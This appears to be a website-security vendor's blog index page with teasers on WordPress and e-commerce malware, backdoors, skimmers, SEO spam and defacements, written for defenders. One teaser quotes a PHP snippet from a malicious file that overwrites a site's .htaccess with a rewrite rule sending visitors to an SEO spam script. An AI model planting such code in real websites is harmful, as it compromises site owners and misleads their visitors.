Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

On a daily basis we find different kinds of malware like backdoors, credit card stealers, injected scripts, and phishing pages. While each one of those catches our attention, we recently found an interesting WordPress administration login bypass script.

Read More ...

Each and every day the attackers get more clever and exploit new attack vectors. Sucuri Labs recently found a malicious JavaScript hidden in the database of a WordPress website.

Read More ...

A very common pattern in compromised websites is the presence of backdoors and other malicious codes. Attackers use different techniques and malware to abuse of server resources, distribute spam and at the same time, maintain access to the site for as long as they can.

Read More ...

Lately we've been dealing with an increase in attacks against ecommerce platforms. Attackers usually choose this type of solution (like Magento & others) because of the sensitive information on credit cards they can extract, as well as other potential monetary gains.

Read More ...

For many years, spam injections placed inside legitimate pages remain one of the prevalent types of black hat SEO hacks that we clean. Hackers constantly invent new tricks to make spam blocks invisible to human visitors while indexable by search engines.

Read More ...

Injecting malware into core files of CMS installations is one of the techniques attackers use. From the user’s perspective, it is easier to detect and remediate such cases if they are using a File Integrity Monitoring system. On the other hand, if they are not monitoring file changes, they could be afraid of modifying such core files, therefore leaving the website infected.

Read More ...

Website defacement is still a big issue for various website owners. It directly impacts on your online presence / visibility and as a consequence, it may get your website flagged as “Hacked” by different search engines.

Read More ...

Lately, we’ve uncovered and detailed lots of techniques being used against e-commerce platforms to steal sensitive information, mostly credit card and login credentials. With the holiday season approaching, e-commerce platforms become an even higher target due to increase in sales during the season.

Read More ...

I was assisting a client with their compromised website and came across a file called unsave.php that was primarily used to inject a rewrite into the .htaccess file so that the SEO spam payload of the file goday.php could be delivered to certain visitors sent to the directory hosting these files:

{
if ((filesize(".htaccess"))>100)
{
$out = fopen("../.htaccess", "w");
fwrite ($out, "RewriteEngine On
RewriteRule ^([A-Za-z0-9-]+).html$ goday.php?hl=$1 [L]");
fclose($out);
}

Read More ...

Attackers use different techniques to distribute SPAM in a compromised website. Most of the time they choose the file structure to inject the malicious code as it’s a more practical approach. There are exceptions to this case though, and today we are going to talk a little bit more about it.

Read More ...